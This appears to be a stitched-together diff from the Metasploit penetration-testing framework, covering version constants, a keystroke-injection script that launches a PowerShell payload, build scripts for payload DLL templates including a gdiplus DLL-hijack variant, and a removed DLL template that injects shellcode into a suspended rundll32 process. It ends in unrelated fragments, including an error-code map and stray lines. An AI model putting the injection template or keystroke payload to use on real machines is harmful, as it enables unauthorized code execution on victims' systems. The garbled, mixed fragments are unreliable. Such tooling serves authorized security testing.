+    "V4_9_5_SNAPSHOT",
+    "V4_9_5",
+    "V4_9_6_SNAPSHOT",
+    "V4_9_6",
+    "V4_9_7_SNAPSHOT",
+    "V4_9_7",
+    "V4_9_8_SNAPSHOT",
+    "V4_9_8",
+    "V4_9_9_SNAPSHOT",
+    "V4_9_9",
+    "V5_0_0_SNAPSHOT",
+    "V5_0_0",
+    "V5_0_1_SNAPSHOT",
+    "V5_0_1",
+    "V5_0_2_SNAPSHOT",
+    "V5_0_2",
+    "V5_0_3_SNAPSHOT",
+    "V5_0_3",
+    "V5_0_4_SNAPSHOT",
+    "V5_0_4",
+    "V5_0_5_SNAPSHOT",
+    "V5_0_5",
+    "V5_0_6_SNAPSHOT",
+    "V5_0_6",
+    "V5_0_7_SNAPSHOT",
+    "V5_0_7",
+    "V5_0_8_SNAPSHOT",
+    "V5_0_8",
+    "V5_0_9_SNAPSHOT",
+    "V5_0_9",
+    "V5_1_0_SNAPSHOT",
+    "V5_1_0",
+    "V5_1_1_SNAPSHOT",
+    "V5_1_1",
+    "V5_1_2_SNAPSHOT",
+    "V5_1_2",
+    "V5_1_3_SNAPSHOT",
+    "V5_1_3",
+    "V5_1_4_SNAPSHOT",
+    "V5_1_4",
+    "V5_1_5_SNAPSHOT",
+    "V5_1_5",
+    "V5_1_6_SNAPSHOT",
+    "V5_1_6",
+    "V5_1_7_SNAPSHOT",
+    "V5_1_7",
+    "V5_1_8_SNAPSHOT",
+    "V5_1_8",
+    "V5_1_9_SNAPSHOT",
+    "V5_1_9",
+    "V5_2_0_SNAPSHOT",
+    "V5_2_0",
+    "V5_2_1_SNAPSHOT",
+    "V5_2_1",
+    "V5_2_2_SNAPSHOT",
+    "V5_2_2",
+    "V5_2_3_SNAPSHOT",
+    "V5_2_3",
+    "V5_2_4_SNAPSHOT",
+    "V5_2_4",
+    "V5_2_5_SNAPSHOT",
+    "V5_2_5",
+    "V5_2_6_SNAPSHOT",
+    "V5_2_6",
+    "V5_2_7_SNAPSHOT",
+    "V5_2_7",
+    "V5_2_8_SNAPSHOT",
+    "V5_2_8",
+    "V5_2_9_SNAPSHOT",
+    "V5_2_9",
+    "V5_3_0_SNAPSHOT",
+    "V5_3_0",
+    "V5_3_1_SNAPSHOT",
+    "V5_3_1",
+    "V5_3_2_SNAPSHOT",
+    "V5_3_2",
+    "V5_3_3_SNAPSHOT",
+    "V5_3_3",
+    "V5_3_4_SNAPSHOT",
+    "V5_3_4",
+    "V5_3_5_SNAPSHOT",
+    "V5_3_5",
+    "V5_3_6_SNAPSHOT",
+    "V5_3_6",
+    "V5_3_7_SNAPSHOT",
+    "V5_3_7",
+    "V5_3_8_SNAPSHOT",
+    "V5_3_8",
+    "V5_3_9_SNAPSHOT",
+    "V5_3_9",
+    "V5_4_0_SNAPSHOT",
+    "V5_4_0",
+    "V5_4_1_SNAPSHOT",
+    "V5_4_1",
+    "V5_4_2_SNAPSHOT",
+    "V5_4_2",
+    "V5_4_3_SNAPSHOT",
+    "V5_4_3",
+    "V5_4_4_SNAPSHOT",
+    "V5_4_4",
+    "V5_4_5_SNAPSHOT",
+    "V5_4_5",
+    "V5_4_6_SNAPSHOT",
+    "V5_4_6",
+    "V5_4_7_SNAPSHOT",
+    "V5_4_7",
+    "V5_4_8_SNAPSHOT",
+    "V5_4_8",
+    "V5_4_9_SNAPSHOT",
+    "V5_4_9",
+    "V5_5_0_SNAPSHOT",
+    "V5_5_0",
+    "V5_5_1_SNAPSHOT",
+    "V5_5_1",
+    "V5_5_2_SNAPSHOT",
+    "V5_5_2",
+    "V5_5_3_SNAPSHOT",
+    "V5_5_3",
+    "V5_5_4_SNAPSHOT",
+    "V5_5_4",
+    "V5_5_5_SNAPSHOT",
+    "V5_5_5",
+    "V5_5_6_SNAPSHOT",
+    "V5_5_6",
+    "V5_5_7_SNAPSHOT",
+    "V5_5_7",
+    "V5_5_8_SNAPSHOT",
+    "V5_5_8",
+    "V5_5_9_SNAPSHOT",
+    "V5_5_9",
+    "V5_6_0_SNAPSHOT",
+    "V5_6_0",
+    "V5_6_1_SNAPSHOT",
+    "V5_6_1",
+    "V5_6_2_SNAPSHOT",
+    "V5_6_2",
+    "V5_6_3_SNAPSHOT",
+    "V5_6_3",
+    "V5_6_4_SNAPSHOT",
+    "V5_6_4",
+    "V5_6_5_SNAPSHOT",
+    "V5_6_5",
+    "V5_6_6_SNAPSHOT",
+    "V5_6_6",
+    "V5_6_7_SNAPSHOT",
+    "V5_6_7",
+    "V5_6_8_SNAPSHOT",
+    "V5_6_8",
+    "V5_6_9_SNAPSHOT",
+    "V5_6_9",
+    "V5_7_0_SNAPSHOT",
+    "V5_7_0",
+    "V5_7_1_SNAPSHOT",
+    "V5_7_1",
+    "V5_7_2_SNAPSHOT",
+    "V5_7_2",
+    "V5_7_3_SNAPSHOT",
+    "V5_7_3",
+    "V5_7_4_SNAPSHOT",
+    "V5_7_4",
+    "V5_7_5_SNAPSHOT",
+    "V5_7_5",
+    "V5_7_6_SNAPSHOT",
+    "V5_7_6",
+    "V5_7_7_SNAPSHOT",
+    "V5_7_7",
+    "V5_7_8_SNAPSHOT",
+    "V5_7_8",
+    "V5_7_9_SNAPSHOT",
+    "V5_7_9",
+    "V5_8_0_SNAPSHOT",
+    "V5_8_0",
+    "V5_8_1_SNAPSHOT",
+    "V5_8_1",
+    "V5_8_2_SNAPSHOT",
+    "V5_8_2",
+    "V5_8_3_SNAPSHOT",
+    "V5_8_3",
+    "V5_8_4_SNAPSHOT",
+    "V5_8_4",
+    "V5_8_5_SNAPSHOT",
+    "V5_8_5",
+    "V5_8_6_SNAPSHOT",
+    "V5_8_6",
+    "V5_8_7_SNAPSHOT",
+    "V5_8_7",
+    "V5_8_8_SNAPSHOT",
+    "V5_8_8",
+    "V5_8_9_SNAPSHOT",
+    "V5_8_9",
+    "V5_9_0_SNAPSHOT",
+    "V5_9_0",
+    "V5_9_1_SNAPSHOT",
+    "V5_9_1",
+    "V5_9_2_SNAPSHOT",
+    "V5_9_2",
+    "V5_9_3_SNAPSHOT",
+    "V5_9_3",
+    "V5_9_4_SNAPSHOT",
+    "V5_9_4",
+    "V5_9_5_SNAPSHOT",
+    "V5_9_5",
+    "V5_9_6_SNAPSHOT",
+    "V5_9_6",
+    "V5_9_7_SNAPSHOT",
+    "V5_9_7",
+    "V5_9_8_SNAPSHOT",
+    "V5_9_8",
+    "V5_9_9_SNAPSHOT",
+    "V5_9_9",
+    "HIGHER_VERSION"
+ ]
@@ -0,0 +1,14 @@
+REM Title: Metasploit Generated Payload
+REM Description: Opens a payload via powershell on the system
+REM Version: 1.0
+REM Open start menu
+REM We use cmd.exe since the powershell payload is likely too long for the run bar
+GUI r
+DELAY 750
+STRING cmd.exe
+DELAY 750
+ENTER
+DELAY 750
+STRING powershell.exe %{var_payload}
+DELAY 750
+ENTER
@@ -0,0 +1,10 @@
+# PE Source Code
+This directory contains the source code for the PE executable templates.
+
+## Building DLLs
+Use the provided `build_dlls.bat` file, and run it from within the Visual Studio
+developer console. The batch file requires that the `%VCINSTALLDIR%` environment
+variable be defined (which it should be by default). The build script will
+create both the x86 and x64 templates before moving them into the correct
+folder. The current working directory when the build is run must be the source
+code directory (`pe`).
@@ -0,0 +1,7 @@
+@echo off
+
+for /D %%d in (dll*) do (
+  pushd "%%d"
+  build.bat
+  popd
+)
@@ -3,12 +3,13 @@
 if "%~1"=="" GOTO NO_ARGUMENTS
 echo Compiling for: %1
 call "%VCINSTALLDIR%Auxiliary\Build\vcvarsall.bat" %1
-cl /LD /GS- /DBUILDMODE=2 template.c /Fe:template_%1_windows.dll /link kernel32.lib /entry:DllMain /subsystem:WINDOWS
+rc /v template.rc
+cl /LD /GS- /DBUILDMODE=2 template.c /Fe:template_%1_windows.dll /link kernel32.lib template.res /entry:DllMain /subsystem:WINDOWS
+cl /LD /GS- /DBUILDMODE=2 /DSCSIZE=262144 template.c /Fe:template_%1_windows.256kib.dll /link kernel32.lib template.res /entry:DllMain /subsystem:WINDOWS
 exit /B

 :NO_ARGUMENTS
 %COMSPEC% /c "%0" x86
 %COMSPEC% /c "%0" x64
-del  *.obj
+del  *.obj *.res
 move *.dll ..\..\..
-
@@ -1,5 +1,6 @@
-
+#ifndef SCSIZE
 #define SCSIZE 4096
+#endif
 unsigned char code[SCSIZE] = "PAYLOAD:";
 char szSyncNameS[MAX_PATH] = "Local\\Semaphore:Default\0";
 char szSyncNameE[MAX_PATH] = "Local\\Event:Default\0";
@@ -0,0 +1,15 @@
+@echo off
+
+if "%~1"=="" GOTO NO_ARGUMENTS
+echo Compiling for: %1
+call "%VCINSTALLDIR%Auxiliary\Build\vcvarsall.bat" %1
+rc /v /fo template.res ../dll/template.rc
+cl /LD /GS- /DBUILDMODE=2 /I . /FI exports.h ../dll/template.c /Fe:template_%1_windows_dccw_gdiplus.dll /link kernel32.lib template.res /entry:DllMain /subsystem:WINDOWS
+cl /LD /GS- /DBUILDMODE=2 /DSCSIZE=262144 /I . /FI exports.h ../dll/template.c /Fe:template_%1_windows_dccw_gdiplus.256kib.dll /link kernel32.lib template.res /entry:DllMain /subsystem:WINDOWS
+exit /B
+
+:NO_ARGUMENTS
+%COMSPEC% /c "%0" x86
+%COMSPEC% /c "%0" x64
+del  *.exp *.lib *.res *.obj
+move *.dll ..\..\..
@@ -1,24 +0,0 @@
-#
-# XXX: NOTE: this will only compile the x86 version.
-#
-# To compile the x64 version, use:
-# C:\> call "c:\Program Files (x86)\Microsoft Visual Studio 9.0\VC\vcvarsall.bat" amd64
-# C:\> cl.exe -LD /Zl /GS- /DBUILDMODE=2 /link /entry:DllMain kernel32.lib
-#
-
-if [ -z "$PREFIX" ]; then
-  PREFIX=i686-w64-mingw32 
-fi
-
-rm -f *.o *.dll
-$PREFIX-gcc -c template.c
-$PREFIX-windres -o rc.o template.rc
-$PREFIX-gcc -mdll -o junk.tmp -Wl,--base-file,base.tmp template.o rc.o
-rm -f junk.tmp
-$PREFIX-dlltool --dllname template_x86_windows.dll --base-file base.tmp --output-exp temp.exp #--def template.def
-rm -f base.tmp
-$PREFIX-gcc -mdll -o template_x86_windows.dll template.o rc.o -Wl,temp.exp
-rm -f temp.exp
-
-$PREFIX-strip template_x86_windows.dll
-rm -f *.o
@@ -1,6 +1,3 @@
-#define SCSIZE 2048
-unsigned char code[SCSIZE] = "PAYLOAD:";
-
 #ifdef _MSC_VER
 	#pragma comment (linker, "/export:GdipAlloc=c:/windows/system32/gdiplus.GdipAlloc,@34")
 	#pragma comment (linker, "/export:GdipCloneBrush=c:/windows/system32/gdiplus.GdipCloneBrush,@46")
@@ -1,97 +0,0 @@
-#include <windows.h>
-#include "template.h"
-
-/* hand-rolled bzero allows us to avoid including ms vc runtime */
-void inline_bzero(void *p, size_t l)
-{
-
-           BYTE *q = (BYTE *)p;
-           size_t x = 0;
-           for (x = 0; x < l; x++)
-                     *(q++) = 0x00;
-}
-
-void ExecutePayload(void);
-
-BOOL WINAPI
-DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved)
-{
-    switch (dwReason)
-    {
-        case DLL_PROCESS_ATTACH:
-			ExecutePayload();
-            break;
-
-        case DLL_PROCESS_DETACH:
-            // Code to run when the DLL is freed
-            break;
-
-        case DLL_THREAD_ATTACH:
-            // Code to run when a thread is created during the DLL's lifetime
-            break;
-
-        case DLL_THREAD_DETACH:
-            // Code to run when a thread ends normally.
-            break;
-    }
-    return TRUE;
-}
-
-void ExecutePayload(void) {
-    int error;
-	PROCESS_INFORMATION pi;
-	STARTUPINFO si;
-	CONTEXT ctx;
-	DWORD prot;
-   LPVOID ep;
-
-	// Start up the payload in a new process
-	inline_bzero( &si, sizeof( si ));
-	si.cb = sizeof(si);
-
-	// Create a suspended process, write shellcode into stack, make stack RWX, resume it
-	if(CreateProcess( 0, "rundll32.exe", 0, 0, 0, CREATE_SUSPENDED|IDLE_PRIORITY_CLASS, 0, 0, &si, &pi)) {
-		ctx.ContextFlags = CONTEXT_INTEGER|CONTEXT_CONTROL;
-		GetThreadContext(pi.hThread, &ctx);
-
-	   ep = (LPVOID) VirtualAllocEx(pi.hProcess, NULL, SCSIZE, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
-
-        WriteProcessMemory(pi.hProcess,(PVOID)ep, &code, SCSIZE, 0);
-
-#ifdef _WIN64
-	   ctx.Rip = (DWORD64)ep;
-#else
-	   ctx.Eip = (DWORD)ep;
-#endif
-
-        SetThreadContext(pi.hThread,&ctx);
-
-        ResumeThread(pi.hThread);
-        CloseHandle(pi.hThread);
-        CloseHandle(pi.hProcess);
-	}
-   // ExitProcess(0);
-   ExitThread(0);
-}
-
-/*
-typedef VOID
-(NTAPI *PIMAGE_TLS_CALLBACK) (
-    PVOID DllHandle,
-    ULONG Reason,
-    PVOID Reserved
-    );
-
-VOID NTAPI TlsCallback(
-      IN PVOID DllHandle,
-      IN ULONG Reason,
-      IN PVOID Reserved)
-{
-	__asm  ( "int3" );
-}
-
-ULONG _tls_index;
-PIMAGE_TLS_CALLBACK _tls_cb[] = { TlsCallback, NULL };
-IMAGE_TLS_DIRECTORY _tls_used = { 0, 0, (ULONG)&_tls_index, (ULONG)_tls_cb, 1000, 0 };
-*/
-
@@ -1,3 +0,0 @@
-EXPORTS
-DllMain@12
-
@@ -1,18 +0,0 @@
-
-LANGUAGE 9, 1
-
-
-VS_VERSION_INFO VERSIONINFO
- FILEVERSION 0,0,0,1
- PRODUCTVERSION 0,0,0,1
- FILEFLAGSMASK 0x17L
- FILEFLAGS 0x0L
- FILEOS 0x4L
- FILETYPE 0x2L
- FILESUBTYPE 0x0L
-BEGIN
-
-END
-
-#define RT_HTML  23
-
@@ -4,6 +4,7 @@ if "%~1"=="" GOTO NO_ARGUMENTS
 echo Compiling for: %1
 call "%VCINSTALLDIR%Auxiliary\Build\vcvarsall.bat" %1
 cl /CLR /LD /GS- /I ..\dll /DBUILDMODE=2 template.cpp /Fe:template_%1_windows_mixed_mode.dll /link mscoree.lib kernel32.lib /entry:DllMain /subsystem:WINDOWS
+cl /CLR /LD /GS- /I ..\dll /DBUILDMODE=2 /DSCSIZE=262144 template.cpp /Fe:template_%1_windows_mixed_mode.256kib.dll /link mscoree.lib kernel32.lib /entry:DllMain /subsystem:WINDOWS
 exit /B

 :NO_ARGUMENTS
@@ -0,0 +1,101 @@
+# Mostly from https://docs.rocketsoftware.com/bundle/grv1653317862214_grv1653317862214/page/nhb1653316841876.html
+{
+  0: "UVE_NOERROR",
+  14002: "UVE_ENOENT",
+  14005: "UVE_EIO",
+  14009: "UVE_EBADF",
+  14012: "UVE_ENOMEM",
+  14013: "UVE_EACCES",
+  14022: "UVE_EINVAL",
+  14023: "UVE_ENFILE",
+  14024: "UVE_EMFILE",
+  14028: "UVE_ENOSPC",
+  14551: "UVE_NETUNREACH",
+  22001: "UVE_BFN",
+  22002: "UVE_BTS",
+  20003: "UVE_IID",
+  22004: "UVE_LRR",
+  22005: "UVE_NFI",
+  30001: "UVE_RNF",
+  30002: "UVE_LCK",
+  30095: "UVE_FIFS",
+  30097: "UVE_SELFAIL",
+  30098: "UVE_LOCKINVALID",
+  30099: "UVE_SEQOPENED",
+  30100: "UVE_HASHOPENED",
+  30101: "UVE_SEEKFAILED",
+  30103: "UVE_INVALIDATKEY",
+  30105: "UVE_UNABLETOLOADSUB",
+  30106: "UVE_BADNUMARGS",
+  30107: "UVE_SUBERROR",
+  30108: "UVE_ITYPEFTC",
+  30109: "UVE_ITYPEFAILEDTOLOAD",
+  30110: "UVE_ITYPENOTCOMPILED",
+  30111: "UVE_BADITYPE",
+  30112: "UVE_INVALIDFILENAME",
+  30113: "UVE_WEOFFAILED",
+  30114: "UVE_EXECUTEISACTIVE",
+  30115: "UVE_EXECUTENOTACTIVE",
+  30124: "UVE_TX_ACTIVE",
+  30125: "UVE_CANT_ACCESS_PF",
+  30126: "UVE_FAIL_TO_CANCEL",
+  30127: "UVE_INVALID_INFO_KEY",
+  30128: "UVE_CREATE_FAILED",
+  30129: "UVE_DUPHANDLE_FAILED",
+  31000: "UVE_NVR",
+  31001: "UVE_NPN",
+  39101: "UVE_NODATA",
+  39119: "UVE_AT_INPUT",
+  39120: "UVE_SESSION_NOT_OPEN",
+  39121: "UVE_UVEXPIRED",
+  39122: "UVE_CSVERSION",
+  39123: "UVE_COMMSVERSION",
+  39124: "UVE_BADSIG",
+  39125: "UVE_BADDIR",
+  39127: "UVE_BAD_UVHOME",
+  39128: "UVE_INVALIDPATH",
+  39129: "UVE_INVALIDACCOUNT",
+  39130: "UVE_BAD_UVACCOUNT_FILE",
+  39131: "UVE_FTA_NEW_ACCOUNT",
+  39134: "UVE_ULR",
+  39135: "UVE_NO_NLS",
+  39136: "UVE_MAP_NOT_FOUND",
+  39137: "UVE_NO_LOCALE",
+  39138: "UVE_LOCALE_NOT_FOUND",
+  39139: "UVE_CATEGORY_NOT_FOUND",
+  39201: "UVE_SR_SOCK_CON_FAIL",
+  39210: "UVE_SR_SELECT_FAIL",
+  39211: "UVE_SR_SELECT_TIMEOUT",
+  40001: "UVE_INVALIDFIELD",
+  40002: "UVE_SESSIONEXISTS",
+  40003: "UVE_BADPARAM",
+  40004: "UVE_BADOBJECT",
+  40005: "UVE_NOMORE",
+  40006: "UVE_NOTATINPUT",
+  40007: "UVE_INVALID_DATAFIELD",
+  40008: "UVE_BAD_DICTIONARY_ ENTRY",
+  40009: "UVE_BAD_CONVERSION_ DATA",
+  45000: "UVE_FILE_NOT_OPEN",
+  45001: "UVE_OPENSESSION_ERR",
+  45002: "UVE_NONNULL_RECORDID",
+  80011: "UVE_BAD_LOGINNAME",
+  80019: "UVE_BAD_PASSWORD",
+  80144: "UVE_ACCOUNT_EXPIRED",
+  80147: "UVE_RUN_REMOTE_FAILED",
+  80148: "UVE_UPDATE_USER_FAILED",
+  81001: "UVE_RPC_BAD_CONNECTION",
+  81002: "UVE_RPC_NO_CONNECTION",
+  81005: "UVE_RPC_WRONG_VERSION",
+  81007: "UVE_RPC_NO_MORE_ CONNECTIONS",
+  81009: "UVE_RPC_FAILED",
+  81011: "UVE_RPC_UNKNOWN_HOST",
+  81014: "UVE_RPC_CANT_FIND_ SERVICE",
+  81015: "UVE_RPC_TIMEOUT",
+  81016: "UVE_RPC_REFUSED",
+  81017: "UVE_RPC_SOCKET_INIT_ FAILED",
+  81018: "UVE_RPC_SERVICE_PAUSED",
+  81019: "UVE_RPC_BAD_TRANSPORT",
+  81020: "UVE_RPC_BAD_PIPE",
+  81021: "UVE_RPC_PIPE_WRITE_ERROR",
+  81022: "UVE_RPC_PIPE_READ_ERROR"
+}
--- a/Show More
+++ b/Show More
@@ -1 +1 @@
 .0.2
 .0.5
				`@@ -0,0 +1 @@`
				`This directory contains ActiveRecord concerns, models and validators.`
				`@@ -0,0 +1,2 @@`
				`$someText = "Hello!" ; $someText > "C:\flag.txt"`